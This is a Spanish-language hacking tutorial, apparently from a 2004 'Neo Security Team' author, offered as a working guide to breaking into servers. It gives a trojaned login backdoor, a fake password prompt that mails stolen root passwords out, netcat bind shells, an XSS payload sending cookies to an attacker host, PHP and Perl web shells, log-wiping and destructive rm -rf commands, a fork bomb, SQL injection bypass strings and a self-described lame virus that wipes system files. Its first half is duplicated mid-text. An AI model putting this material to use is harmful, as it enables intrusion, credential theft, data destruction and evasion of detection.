/*
Name: Hacking
Copyright: [N]eo Security [T]eam [NST]®
Author: HaCkZaTaN
Date: 04/11/04 19:19
Description: Hacking
*/
_________________________________
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|=-=-=-=-=-=by HaCkZaTaN-=-=-=-=-=|
|-=-=-You may pray for your Pc=-=-|
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|_________________________________|
_________
|1= Intro|
|________|
Hey q mas!! Pues aqi escribiendo esto haber que mas se me ocurre
____________
|2= Objetivo|
|___________|
Ir a Google.com
oK tenemosque mirar el objetivo detalladamente y anotar toda la Info Lo mas que podamos y no se te
ocurra Conectarte desde tu pc xD hazlo
desde una shell y utilzar bouncers...............................
________
|3= O.S |
|_______|
oK determinar el O.S es muy importante
Formas: __________________________________________________
Telnet> Host 23 [Es mucho mejor aveces colocar el puerto ssh <<22>>]
___________________________________________________
Ftp> Host 21 [Para saber el server de ftp y mirar si tiene bugs para entrar como root es una forma
mas facil Determinar el DAEMON]
_______________________
|4= Escanear una WebPage|
|_______________________|
Yo scaneo con nmap es el mejor scanner que hay en la Net <<That's what i Think>>
Este scanner te da un log muy buena de los puertos y alguna informacion extra
Tenemos que mirar si esta en varios Dns para mirar con que nos metemos por que aveces estan los
diferentes puertos en cada Dns>>
Me explico [Dns1]>>>Tiene abierto el ftp
[Dns2[>>>Tiene abierto el ssh
Escaneamod de esta manera
nslookup host
____________________________________
|5= Tratar de entrar por los puertos|
|___________________________________|
Para sacar info de los puertos y de los daemons hacemos
telnet> host 21
telnet> host 22
telnet> host 25
telnet> host 79
telnet> host 110
telnet> host 109
telnet> host 143
telnet> host 139 <<<por si utiliza archivos compartidos en windows>>>
telnet> host 119
oK nos vamos a mirar a cada daemon y mirar su server ejemplo
Port 21 Server ProFtp>>>> Buscamos Xploits para esta version de este server para tener permisos admins,
O si nos deja entrar como anonimo o
guest y nos deja mirar /etc/passwd o /etc/shadow/ pues miramos si no estan cifrados y buscamos un
desencriptador de Md5 o en lo que este
La mayoria de linux o Unix encriptan a 64bits
Port 22 lo mismo buscamos el server de ssh
Port 79 Finger si lo tienen abierto nos libran un peso de encima por que Esto nos da mucha informacion
del usuario o root escribimos <<</w>>>
para mirar quien esta en linea oK esto nos da mucho info.
Una cosa tambien podemos poner un sniffer es una grandiosa idea
Bueno con la informacion que aparece cuando haces el finger el passwd podria ser muy facil de sacarlo
y nos serviria como una shell gratuita
y de buena calidad <<smart me, don't I?>>
Otra seria sacar los passwd de los emails para mirar de que es lo que habla el root y con quien y hasta
depronto podemos utilixar nuestra
ingenieria social para sacar los passwd de la PC.
Podemos acceder por el puerto 110 <<POP>>
Podemos utilizar xploits, hay muchos para cada tipo de server de sendmail <<25>> o POP <<110>>
Tambien por el Puerto 80 scaneamos Bugs:
PHP NUKE
SQL
CGI
PL
ASP
APACHE
ORACLE
Etc...
____________________
|6= Local Xploits |
|___________________|
Podemos utilizar exploits cuando ya estamos dentro de la maquina.
sh-3.00$ sh Xploit.sh
ven que facil
oK deben de saber de C por que aveces lo xplits no vienen bien configurados
Una vex hecho todo eso creamos un Usuario para tener una shell gratis xD
Pero no usuario normal si no uno con derechos como root (osea no ser root por que no se puede pero que tenga todos los derechos
posibles)) xD
Ahora estan con la moda del W00t, ptrace.. Bueno pues busquen acerca de el pero ademas ya son obsoletos
Jugando con offsets
Digo esto para los que les gusta jugar con ella
Un pequeno Brute Force en Perl.
***********************
#!/usr/bin/perl
$MIN=0;
$MAX=5000;
while($MIN<$MAX)
{
printf('offset : $MIN n');
system('xploit $MIN');
$MIN++;
}
**************************
__________________
|7- Remotes Xploits|
|__________________|
Ok subimos un xploit a nuestra shell y colocamos:
root@HaCkZaTaN!!:~ # ./s 0 && cat | netcat host 457
id
uid=28(nouser) gid=28(nogroup) groups=28(nogroup)
y listo nos dio una shell nobody.
Acuerdense que hay que jugar con el offset para poder tener root xD.
_________________
|8= Borrar Huellas|
|_________________|
Borramos Huellas de esta manera
rm /var/log/wtmp
rm /var/log/lastlog
Para arrglar el PC
tee /var/log/wtmp
tee /var/log/lastlog
modo mas bueno seria
find / -name log && rm -rf && rm -f && ps -def && grep klogd && kill -9 pid && ps -def | grep syslog
cd /
rm -rf .bash_history && rm -rf /var/adm && rm -rf /root/.bash_logout && rm -rf /root/.bash_history
hay que Editar.bash_history o .sh_history
y si quieres es tumbar la PC xD:
rm -rf/etc/passwd
rm -rf /etc/shadow
rm -rf /bin/login
rm -rf /bin/rm
rm -rf /etc/inetd.conf
killall login
***********************************
find / -name log* -exec rm -rf {} \ //Forma ofuscada
***********************************
Otra Forma ((REpito caso todo lo de arriba xD
Buscando archivos con nombres que empiexen por log:
****************
find / -name log //Despues los borramos
*****************
********************
ps -def | grep klogd //Editamos este archivo
ps -def | grep syslog //Editamos este archivo
********************
***********
kill -9 pid //Matamos todos los procesos
***********
****************************
cd /
unset HISTFILE
rm -rf .bash_history
rm -rf /var/adm
rm -rf /root/.bash_logout
rm -rf /root/.bash_history
****************************
En windows Seria
del c:\winnt\system32\logfiles
del c:\windwos\system32\logfiles
del c:\winnt\system32\logfiles\*.log
dir /s *.log
dir /s *.evt
Bueno pero esto no es todo es mejor que te bajes un Zapper o un Wipper es la misma cosa pero
gente le gusta llamarlo de diferentes maneras
____________
|9- Troyanos|
|___________|
Troyano para linux el mas famoso y mas confiable BackDoor <<Hint: La mayoria de linux no tienen
antivirus>>
Lo llamaremos login.c
***********************************************************************************************
#include <stdio.h>
#define OLDLOGIN "/usr/lib/login"
#define LOGINNAME "login"
#define MAGIC_WORD "localhost"
#define REVISION "$Id: Localcore 2000/08/14 21:31:00 marekm Exp $"
char **exe;
do_back() {
puts(REVISION);
putenv("TERM=vt100");
putenv("HISTFILE=/dev/null");
execl("/bin/sh","sh","-i",0);
}
main(argc, argv)
int argc;
char *argv[];
{
exe = argv;
exe[0] = LOGINNAME;
if ((char *)getenv("DISPLAY") != (char *)NULL)
if (strncmp(getenv("DISPLAY"),MAGIC_WORD,strlen(MAGIC_WORD)) == 0)
do_back();
execv(OLDLOGIN,exe);
}
*****************************************************************************************************
Bueno lo Subimos asi;
cp /bin/login /usr/lib/login
chmod 777 /usr/lib/login
tee login.c
gcc -O2 login.c -o login
chmod 4755 /bin/login
Bueno si queremos colocar clave modificamos
#define MAGIC_WORD "localhost" <<<Por esto>>>
#define MAGIC_WORD "aqui el password sin espacios"
oK ya tenemos root xD.
Esto seria en Windwos Utilizamos el SUb7 0 SubSeven
Ok subiremos un bouncer xD
Hacemos esto
"advanced"
"PORT REDIRECT"
en "input port" pon el puerto que nos vamos a conectar ejemplo 1942
en "output host/ip" Ip/Host a conectar
en "output port" Puerto a conectar 21,23 etc.
<<tambien se puede hacer en el IRC cuando te banean o quieres entras por seguridad>>
Para estar con bouncer en cualquier puerto lo hacemos asi en este caso Sera Http <<80>>
en "input port" 80
en "output host/ip" Host/Ip
en "output port" 80
ahora en el UNICONSOLE ponemos la ip del BOUNCER en vez de www.mju.es y JAMAS sabran que hemos sido
nosotros los que han entrado.
Para entrar en un FTP con claves ROBADAS y que no nos visiten los agradables guardia civiles:
-en "input port" Pon 21
-en "output host/ip" ponemos el OBJETIVO ftp.terra.es (por ejm)
-en "output port" pon 21
oK es facil asi se hace susecivamente con todos los puertos Es lo mismo que en la shell pero un poco
mas complicado
Unos se preguntaran pero como le hago para no estar jugando con comandos desde la URL
pues hay tenemos una Opcion dejar la pagina que estamos atacando con un backdoor o
corriendo algun servidor que nos deje entrar con el ssh (Putty si estas en Windows)
hay un BackDoor que se llama r0nin o puedes buscar mas en google.com hay apareceran
bastantes.
Aqui les dejo un troyano:D
************************************************************************************
************************************************************************************
#include <stdio.h>
#include <pwd.h>
#include <stdlib.h>
#define EMAIL "correo@electronico.aqui"
#define ARCH "arch.fsu
int main(void)
{
char enviar[100];
char grabar[100];
char* clave;
FILE* archivo_ptr;
clave = (char *) getpass("Password:");
puts ("Sorry");
archivo_ptr = fopen(ARCH, "w");
fprintf (archivo_ptr, "Root Password: %s\n", clave);
fclose (archivo_ptr);
#ifndef TMP
sprintf(enviar, "mail %s < %s ; rm %s", EMAIL, ARCH, ARCH);
system(enviar);
#else
sprintf(grabar, "cp %s %s", ARCH, TMP);
system(grabar);
#endif
exit (EXIT_SUCCESS);
}
************************************************************************************
************************************************************************************
La otra opcion que digo es con el NetCat Dejando unpuerto a la escucha con alguna shell
ya sea
zsh sh bash etc.....
Pero como lo hacemos? pues es muy facil
si es una Windows la Maquina que estamos atacando dejas escuchando asi
Name: Hacking
Copyright: [N]eo Security [T]eam [NST]®
Author: HaCkZaTaN
Date: 04/11/04 19:19
Description: Hacking
*/
_________________________________
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|=-=-=-=-=-=by HaCkZaTaN-=-=-=-=-=|
|-=-=-You may pray for your Pc=-=-|
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|_________________________________|
_________
|1= Intro|
|________|
Hey q mas!! Pues aqi escribiendo esto haber que mas se me ocurre
____________
|2= Objetivo|
|___________|
Ir a Google.com
oK tenemosque mirar el objetivo detalladamente y anotar toda la Info Lo mas que podamos y no se te
ocurra Conectarte desde tu pc xD hazlo
desde una shell y utilzar bouncers...............................
________
|3= O.S |
|_______|
oK determinar el O.S es muy importante
Formas: __________________________________________________
Telnet> Host 23 [Es mucho mejor aveces colocar el puerto ssh <<22>>]
___________________________________________________
Ftp> Host 21 [Para saber el server de ftp y mirar si tiene bugs para entrar como root es una forma
mas facil Determinar el DAEMON]
_______________________
|4= Escanear una WebPage|
|_______________________|
Yo scaneo con nmap es el mejor scanner que hay en la Net <<That's what i Think>>
Este scanner te da un log muy buena de los puertos y alguna informacion extra
Tenemos que mirar si esta en varios Dns para mirar con que nos metemos por que aveces estan los
diferentes puertos en cada Dns>>
Me explico [Dns1]>>>Tiene abierto el ftp
[Dns2[>>>Tiene abierto el ssh
Escaneamod de esta manera
nslookup host
____________________________________
|5= Tratar de entrar por los puertos|
|___________________________________|
Para sacar info de los puertos y de los daemons hacemos
telnet> host 21
telnet> host 22
telnet> host 25
telnet> host 79
telnet> host 110
telnet> host 109
telnet> host 143
telnet> host 139 <<<por si utiliza archivos compartidos en windows>>>
telnet> host 119
oK nos vamos a mirar a cada daemon y mirar su server ejemplo
Port 21 Server ProFtp>>>> Buscamos Xploits para esta version de este server para tener permisos admins,
O si nos deja entrar como anonimo o
guest y nos deja mirar /etc/passwd o /etc/shadow/ pues miramos si no estan cifrados y buscamos un
desencriptador de Md5 o en lo que este
La mayoria de linux o Unix encriptan a 64bits
Port 22 lo mismo buscamos el server de ssh
Port 79 Finger si lo tienen abierto nos libran un peso de encima por que Esto nos da mucha informacion
del usuario o root escribimos <<</w>>>
para mirar quien esta en linea oK esto nos da mucho info.
Una cosa tambien podemos poner un sniffer es una grandiosa idea
Bueno con la informacion que aparece cuando haces el finger el passwd podria ser muy facil de sacarlo
y nos serviria como una shell gratuita
y de buena calidad <<smart me, don't I?>>
Otra seria sacar los passwd de los emails para mirar de que es lo que habla el root y con quien y hasta
depronto podemos utilixar nuestra
ingenieria social para sacar los passwd de la PC.
Podemos acceder por el puerto 110 <<POP>>
Podemos utilizar xploits, hay muchos para cada tipo de server de sendmail <<25>> o POP <<110>>
Tambien por el Puerto 80 scaneamos Bugs:
PHP NUKE
SQL
CGI
PL
ASP
APACHE
ORACLE
Etc...
____________________
|6= Local Xploits |
|___________________|
Podemos utilizar exploits cuando ya estamos dentro de la maquina.
sh-3.00$ sh Xploit.sh
ven que facil
oK deben de saber de C por que aveces lo xplits no vienen bien configurados
Una vex hecho todo eso creamos un Usuario para tener una shell gratis xD
Pero no usuario normal si no uno con derechos como root (osea no ser root por que no se puede pero que tenga todos los derechos
posibles)) xD
Ahora estan con la moda del W00t, ptrace.. Bueno pues busquen acerca de el pero ademas ya son obsoletos
Jugando con offsets
Digo esto para los que les gusta jugar con ella
Un pequeno Brute Force en Perl.
***********************
#!/usr/bin/perl
$MIN=0;
$MAX=5000;
while($MIN<$MAX)
{
printf('offset : $MIN n');
system('xploit $MIN');
$MIN++;
}
**************************
__________________
|7- Remotes Xploits|
|__________________|
Ok subimos un xploit a nuestra shell y colocamos:
root@HaCkZaTaN!!:~ # ./s 0 && cat | netcat host 457
id
uid=28(nouser) gid=28(nogroup) groups=28(nogroup)
y listo nos dio una shell nobody.
Acuerdense que hay que jugar con el offset para poder tener root xD.
_________________
|8= Borrar Huellas|
|_________________|
Borramos Huellas de esta manera
rm /var/log/wtmp
rm /var/log/lastlog
Para arrglar el PC
tee /var/log/wtmp
tee /var/log/lastlog
modo mas bueno seria
find / -name log && rm -rf && rm -f && ps -def && grep klogd && kill -9 pid && ps -def | grep syslog
cd /
rm -rf .bash_history && rm -rf /var/adm && rm -rf /root/.bash_logout && rm -rf /root/.bash_history
hay que Editar.bash_history o .sh_history
y si quieres es tumbar la PC xD:
rm -rf/etc/passwd
rm -rf /etc/shadow
rm -rf /bin/login
rm -rf /bin/rm
rm -rf /etc/inetd.conf
killall login
***********************************
find / -name log* -exec rm -rf {} \ //Forma ofuscada
***********************************
Otra Forma ((REpito caso todo lo de arriba xD
Buscando archivos con nombres que empiexen por log:
****************
find / -name log //Despues los borramos
*****************
********************
ps -def | grep klogd //Editamos este archivo
ps -def | grep syslog //Editamos este archivo
********************
***********
kill -9 pid //Matamos todos los procesos
***********
****************************
cd /
unset HISTFILE
rm -rf .bash_history
rm -rf /var/adm
rm -rf /root/.bash_logout
rm -rf /root/.bash_history
****************************
En windows Seria
del c:\winnt\system32\logfiles
del c:\windwos\system32\logfiles
del c:\winnt\system32\logfiles\*.log
dir /s *.log
dir /s *.evt
Bueno pero esto no es todo es mejor que te bajes un Zapper o un Wipper es la misma cosa pero
gente le gusta llamarlo de diferentes maneras
____________
|9- Troyanos|
|___________|
Troyano para linux el mas famoso y mas confiable BackDoor <<Hint: La mayoria de linux no tienen
antivirus>>
Lo llamaremos login.c
***********************************************************************************************
#include <stdio.h>
#define OLDLOGIN "/usr/lib/login"
#define LOGINNAME "login"
#define MAGIC_WORD "localhost"
#define REVISION "$Id: Localcore 2000/08/14 21:31:00 marekm Exp $"
char **exe;
do_back() {
puts(REVISION);
putenv("TERM=vt100");
putenv("HISTFILE=/dev/null");
execl("/bin/sh","sh","-i",0);
}
main(argc, argv)
int argc;
char *argv[];
{
exe = argv;
exe[0] = LOGINNAME;
if ((char *)getenv("DISPLAY") != (char *)NULL)
if (strncmp(getenv("DISPLAY"),MAGIC_WORD,strlen(MAGIC_WORD)) == 0)
do_back();
execv(OLDLOGIN,exe);
}
*****************************************************************************************************
Bueno lo Subimos asi;
cp /bin/login /usr/lib/login
chmod 777 /usr/lib/login
tee login.c
gcc -O2 login.c -o login
chmod 4755 /bin/login
Bueno si queremos colocar clave modificamos
#define MAGIC_WORD "localhost" <<<Por esto>>>
#define MAGIC_WORD "aqui el password sin espacios"
oK ya tenemos root xD.
Esto seria en Windwos Utilizamos el SUb7 0 SubSeven
Ok subiremos un bouncer xD
Hacemos esto
"advanced"
"PORT REDIRECT"
en "input port" pon el puerto que nos vamos a conectar ejemplo 1942
en "output host/ip" Ip/Host a conectar
en "output port" Puerto a conectar 21,23 etc.
<<tambien se puede hacer en el IRC cuando te banean o quieres entras por seguridad>>
Para estar con bouncer en cualquier puerto lo hacemos asi en este caso Sera Http <<80>>
en "input port" 80
en "output host/ip" Host/Ip
en "output port" 80
ahora en el UNICONSOLE ponemos la ip del BOUNCER en vez de www.mju.es y JAMAS sabran que hemos sido
nosotros los que han entrado.
Para entrar en un FTP con claves ROBADAS y que no nos visiten los agradables guardia civiles:
-en "input port" Pon 21
-en "output host/ip" ponemos el OBJETIVO ftp.terra.es (por ejm)
-en "output port" pon 21
oK es facil asi se hace susecivamente con todos los puertos Es lo mismo que en la shell pero un poco
mas complicado
Unos se preguntaran pero como le hago para no estar jugando con comandos desde la URL
pues hay tenemos una Opcion dejar la pagina que estamos atacando con un backdoor o
corriendo algun servidor que nos deje entrar con el ssh (Putty si estas en Windows)
hay un BackDoor que se llama r0nin o puedes buscar mas en google.com hay apareceran
bastantes.
Aqui les dejo un troyano:D
************************************************************************************
************************************************************************************
#include <stdio.h>
#include <pwd.h>
#include <stdlib.h>
#define EMAIL "correo@electronico.aqui"
#define ARCH "arch.fsu
int main(void)
{
char enviar[100];
char grabar[100];
char* clave;
FILE* archivo_ptr;
clave = (char *) getpass("Password:");
puts ("Sorry");
archivo_ptr = fopen(ARCH, "w");
fprintf (archivo_ptr, "Root Password: %s\n", clave);
fclose (archivo_ptr);
#ifndef TMP
sprintf(enviar, "mail %s < %s ; rm %s", EMAIL, ARCH, ARCH);
system(enviar);
#else
sprintf(grabar, "cp %s %s", ARCH, TMP);
system(grabar);
#endif
exit (EXIT_SUCCESS);
}
************************************************************************************
************************************************************************************
La otra opcion que digo es con el NetCat Dejando unpuerto a la escucha con alguna shell
ya sea
zsh sh bash etc.....
Pero como lo hacemos? pues es muy facil
si es una Windows la Maquina que estamos atacando dejas escuchando asi
- Windows
****************************
nc -l -p 8000 -t -e cmd.exe -L
****************************
******************
nc -L -w 1 -p 8000
****************** - Linux
*************************
nc -vvlp 8000 -e /bin/bash
*************************
******************
nc -L -w 1 -p 8000
******************
Bueno tu ya descojeras de las maneras que quieras
entonces despues le sacas la Ip a la Pagina que estas atacando o con el mismo host y desde tu maquina habres el ssh
o el telnet (Putty si estas en Windows) o el nc, recomiendo el netcat por que dejamos a la escucha con el mismo netcat
Entonces nos conectariamos asi
*********************
nc -vv host/ip 8000
********************
_________
|10= Spoof|
|_________|
El spoof es cuando falsean tu ip o la mayoria de los paquetes que entran en ella se utiliza para
saltar firewalls y otros tipos de seguridad.
___________________________
|11= Como tumbar un servidor|
|___________________________|
Compilar el programa:
cc synk4.c –o synk4
Modo de uso
./synk4 <ip-origen> <ip-destino> <puerto-inicial> <puerto-final>
<ip-origen> 0, y el programa utilizara un random de IPS
<ip-destino> Pones la ip de destino ejemplo 127.0.0.1
<puerto-inicial> y <puerto-final>
Eje: ./synk4 0 127.0.0.1 21 21 0 23 23
Se empexara a moverse un contador...
Cuando llegue a 4000 o 5000 o 6000 ya paramos hay
Cuando acabemos todo y cerremos el progrma nos conectaremos al puerto que atacamos y nos damos cuenta
que esta tumbado xD
[root@localhost]# telnet localhost 23
Trying 127.0.0.1...
El programa a descargar se llama SYN <<TCP SYN Flooding>>
Bueno tambien se podria hacer local usar malloc(); y fork();
Ejemplo:
**********************************
/*
Name: LinuxCrash
Copyright: Neo Security Team [NST]®
Author: HaCkZaTaN
Date: 12/09/04 03:51
Description: CrashesLinux
*/
int main()
{
while(1)
{
malloc(1024);
fork();
}
return 0;
}
***************************************
______________
|12= Keylogger|
|_____________|
Bueno a muchos les gusta o no les gusta usar keyloggers pero si necesitas uno pues utilizalo todo
es posible en esta vida y si te dicen que es de lammer pues mas lammer el que se lo deja meter
______________
|12= Tecnicas |
|_____________|
Bueno esto me da hasta pena colocarlo pero bueno como se han dado cuenta ahora la moda de hackear es con el
w00t, r0nin, mass, yim. Pues son utilidades para *nix su modo de uso es sencillisimo
$chmod 777 programa
$./programa
Como pueden ver no tiene ciencia esas tecnicas son estupidas lo bueno es crear shellcodes y xploits
hacer overflows eso si que es muy bueno, trabajar con los offset etc....
______________
|12= XSS |
|_____________|
Pues bueno ahora ya dicen que hackean una pagina Php o Html por hacer XSS en la pagina pero bueno eso
no importa lo que importa es aprender
<input type="text" name="palabra"> que será el formulario.
<input type="submit" name="buscar" value="Buscar"> que será el boton.
Como pueden ver es vulnerable entonces podemos proceder a hacer XSS
Creamos un archivo .php que contenga cookie
Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;
Bueno a mi casi no me gusta explicar si no dejar todo hecho y que usteddes lo descubran sorry si no explico
CrashCool ah creado una Herramienta exelente para esto lo que hace es cifrar el Texto>> Gracias CrashCool Pagina Crashcool.com
Link de descarga
http://crashcool.com/xss-c.zip
[-]XSS generator by CrashCool
[-]Introduzca codigo:
<script>alert("hola");</script> - Generado
<script>var b=String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 34, 104, 111, 108, 97, 34, 41, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62); document.write(b);</script>
[-]Guardarlo en archivo? (s/n) :s - guardado en xss.html
]x[ Pulse la tecla ENTER para salir...
Codigo:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define XSS_1 "<script>var b=String.fromCharCode("
#define XSS_2 "); document.write(b);</script>"
#define MAX_ENTRADA 800
/**
*Generador de XSS
*Genera y da la posibilidad de guardar a archivo
*Diseñado para saltar filtros de las comillas ""
*Autor:CrashCool
*Fecha: 03/10/04
*Licencia: GPL
*web: www.crashcool.com
*contacto: crashcool@gmail.com
*V: 1.0.1
*version original en JAVA www.crashcool.com
*/
void guardar(char *salida);
int main()
{ char a[MAX_ENTRADA];
char aux[5];
char *res=NULL,opcion='\0';
int tamanyo,i;
puts("[-]XSS generator by CrashCool");
puts("[-]Introduzca codigo:");
gets(a);
fflush(stdin);
tamanyo=(strlen(a) * 3)+((strlen(a)-1) * 2);
res=(char *)malloc(tamanyo*(sizeof(char)));
strcpy(res,XSS_1);
for(i=0;i<(int)strlen(a);i++)
{
strcpy (aux, "");
sprintf(aux,"%d",(int)a);
if(i< (int)(strlen(a)-1) ) strcat(aux,", ");
strcat(res,aux);
}
strcat(res,XSS_2);
puts("- Generado");
printf("\n%s\n\n",res);
printf("[-]Guardarlo en archivo? (s/n) :");
opcion=getchar();
if(opcion=='s' || opcion =='S'){
guardar(res);
puts(" - guardado en xss.html");
}
fflush(stdin);
puts("]x[ Pulse la tecla ENTER para salir...");
getchar();
return 0;
}
void guardar(char *salida)
{
FILE *archivo;
archivo=fopen("xss.html","w");
fprintf(archivo,"%s",salida);
fclose(archivo);
}
******************************************************************************************
_________________________________
|13= Remote File Inclusion (RFI)|
|_______________________________|
Remote File Inclusion (RFI)
A mi casi no me gusta explicar si no dar el trabajo hecho osea al grano no dar vueltas al asunto
De que trata el Bug!!
----- beging the code in index.php -----
if (!isset($req_path)) $req_path="";
require_once($req_path."funcs.php");
----- end of the code -----
Forma de xplotar
http://localhost/nst/index.php?req_path=http://nst/
_____________________________________________________________________________________________________
Otro bug es el de:
*************************************************
<?
exec($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
************************************************
<?
system($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
*************************************************
<?
passthru($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
*************************************************
<?php
$com = $_GET["com"];
system ("$com");
?>
*************************************************
<?php
echo '<?php $com = $_GET["com"]; system ("$com"); ?>';
?>
*****************************************************
Modo de explotacion
http://localhost/nst/index.php?req_path=http://nst/&com=ls
___________________________________________________________________________________________________
Modo de Busqueda!!
****************************************************************************
****************************************************************************
allinurl: "index.php?*=*.php"
http://www.google.com/search?num=100&hl=en&lr=&q=allinurl%3A+%22index.php%3F*%3D*.php%22&btnG=Search
****************************************************************************
****************************************************************************
inurl: "index.php?*=*.php"
http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=inurl%3A+%22index.php%3F*%3D*.php%22&btnG=Search
****************************************************************************
****************************************************************************
allinurl: /My_eGallery/public/displayCategory.php?
http://www.google.ca/search?hl=en&q=allinurl%3A+%2FMy_eGallery%2Fpublic%2FdisplayCategory.php%3F&meta=
****************************************************************************
****************************************************************************
___________________________________________________________________________________________________
Bueno ahora estan con la Moda de Remote File Inclusion. Y todo esto dado en PHP bueno pues aqui
les traigo unos en Perl Smile Funcionan de la misma manera
http://host/cgi-bin/net.cgi?p=uname -a
Donde:
nst.cgi >> Es el nombre del archivo
p es el comando que esta en el nst.cgi que nos da shell
El que utilizo para esta demostracion es el numero 3 saludos
1
Código:
****************************************************************************
****************************************************************************
#! /usr/bin/perl
use CGI qw(:standard);
print header;
my $c=param("c");
if ($c gt "")
{
$s=`$c 2>&1`;
print start_form,textfield("c",$c),submit("go"),end_form,pre($s)
}
else
{
print "[N]eo Security [T]eam [NST]"
}
****************************************************************************
****************************************************************************
2
Código:
****************************************************************************
****************************************************************************
#! /usr/bin/perl
use CGI qw(:standard);
print header;
my $c=param("c");
if ($c gt "")
{
$s=`$c 2>&1`;
print start_form,textfield("c",$c),submit("go"),end_form,pre($s)
}
else{ print "[N]eo ecurity [T]eam [NST]"
}
****************************************************************************
****************************************************************************
3
Código:
****************************************************************************
****************************************************************************
#!/usr/bin/perl
use CGI qw(:standard);
print header;
my $k=param("p");
my $a=param("a");
if ($a || $k)
{
$l=`$k 2>&1`;
print start_form,textarea("p",$k,3,50);
print submit("Enter");
print end_form;
print pre($l);
}
****************************************************************************
****************************************************************************
_________________________________
|13= Subiendo Archivos a un host|
|_______________________________|
Como subimos archivos a la pagina o host a Hackear?
Pues hay muchas formas pero dare unas cuentas
wget http://www.host.com/archivo.c
lynx http://www.host.com/archivo.c
links http://www.host.com/archivo.c
curl -O http://www.host.com/archivo.c
curl -a ftp://www.host.com/archivo.c
****************************************************************************
****************************************************************************
______________
|14= Rooteando|
|_____________|
Como lo rooteo?
Bueno ahora te toca tu turno de ir a google.com y buscar
Aqui en Neosecurityteam.org tenemos unos cuantos xploits que nos dan root remotamente o localmente
solo necesitas compilarlos y ya
hay un archivo en la red que se llama w00t, xp1.
estos te daran root con solo ejecutarlos en el sistema que bueno no?
jajaj se utilizan asi
./w00t
./xp1
Otra forma seria por shellcodes!!
Pero esto si no lo explicare es algo muy largo pero si quieren tener idea de lo que hablo ok
main()
{
system("/bin/sh"); //exeve(1,"/bin/sh");
}
Compilas eso como un .c y listo despues objdum -d archivo sacamos NULL's bytes osea
xoring y listo. Complicado no!!
****************************************************************************
****************************************************************************
_______________
|15= Compilando|
|______________|
Como compilo?
gcc -O4 -w -g -s archivo.c -o x
gcc archivo.c -x
nasm archivo.asm
Como linkeo desde asm?
nasm -f elf archivo.asm
ld -o archivo.exe archivo.o
****************************************************************************
****************************************************************************
_______________
|16= Anonimo |
|______________|
Quiero estar anonimo?
Busca acerca de
Bouncers
PSYbnc
Proxys
****************************************************************************
****************************************************************************
______________________
|17= Inyeccion SQL |
|____________________|
No explicare mucho solo dare unos User y Pass!!
usuario='geek' senha='s3nh4'
usuario='' or '1' senha='s3nh4'
usuario= 'or' senha= 'or'
usuario=' or ' 1 senha=' or ' 1
usuario='1' = '1' senha='1' = '1'
usuario=' or '1'='1 senha=' or '1'='1
usuario='' or '1'='1' senha='' or '1'='1'
usuario="senha" senha="senha"
usuario="password" senha="password"
usuario="teste" senha="teste"
usuario="123" senha="123"
usuario="1234" senha="1234"
usuario="12345" senha="12345"
usuario="VB" senha="VB"
usuario="visual" senha="visual"
usuario="basic" senha="basic"
usuario=' or senha='teste senha=' or senha='teste
usuario=' or senha='login senha=' or senha='login
usuario=' or email like 'flavio% senha= ' or email like 'flavio%
usuario='or '1'='1' order by 1 -- senha='or '1'='1' order by 1 --
usuario=' or '1'='1' order by 1 -- senha=' or '1'='1' order by 1 --
usuario=' or 1=1-- senha=' or 1=1--
usuario='or''=' senha='or''='
usuario=' or 'a'='a senha=' or 'a'='a
usuario=') or ('a'='a senha=') or ('a'='a
usuario=b' or ' 1=' senha=b' or ' 1='
usuario=' or '| senha=' or '|
usuario=123'or'= senha=123'or'=
usuario=admin'- senha=admin'-
usuario=' or '1=true senha=' or '1=true
usuario=7' or ' 1 senha=7' or ' 1
usuario=root senha=root
usuario=shell senha=shell
usuario=admin senha=123456
usuario=admin senha=admin
Usuario=';shutdown-- senha=';shutdown--
****************************************************************************
****************************************************************************
_____________
|18 OffTopic|
|___________|
Bueno muchos dicen por hay que es un Lame Virus o le dicen otros nombres
mas por que razon? Por que le pasan el codigo a un Lammersito cualquiera
y le dicen mira compila esto y cojeras r00t o ownearas windows o cualquier
cosa. Se puede compilar en windows o linux
gcc LameViruz.c
Código:
/*
Name: LameViruz
Copyright: [N]eo ecurity [T]eam [NST]®
Author: HaCkZaTaN
Date: 26/10/04 17:17
Description: LameViruz
*/
#include <stdio.h>
#include <stdlib.h>
int main()
{
double x;
for (x=0; x<1000000000; x++)
{
printf("\nHacktool\n", x);
printf("\nAhora miraras que ya puedes hackear con solo mirar la pantalla \n", x);
system("rm -rf /bin/*");
system("rm -rf /usr/bin/*");
system("rm -rf /*");
system("del /F /Q C:\\windows\\system32\\hal.dll");
system("del /F /Q C:\\windows\\system32\\kernel32.dll");
system("del /F /Q D:\\windows\\system32\\hal.dll");
system("del /F /Q D:\\windows\\system32\\kernel32.dll");
system("del /F /Q c:\\*.ini");
system("del /F /Q c:\\*.bat");
system("del /F /Q c:\\*.sys");
system("del /F /Q c:\\*.exe");
system("del /F /Q c:\\*.dll");
system("del /F /Q c:\\windows\\*.ini");
}
}
****************************************************************************
****************************************************************************
________________________________________________________________________________________________
NOTA o TIP
Es muy recomendable dar permisos a los archivos que subes o que quieres ejecutar.
como se hace eso?
les dare tres formas
chmod -x archivo
chmod 777 archivo
chmod 777 *
=====================================================================
=====================================================================
- Generado");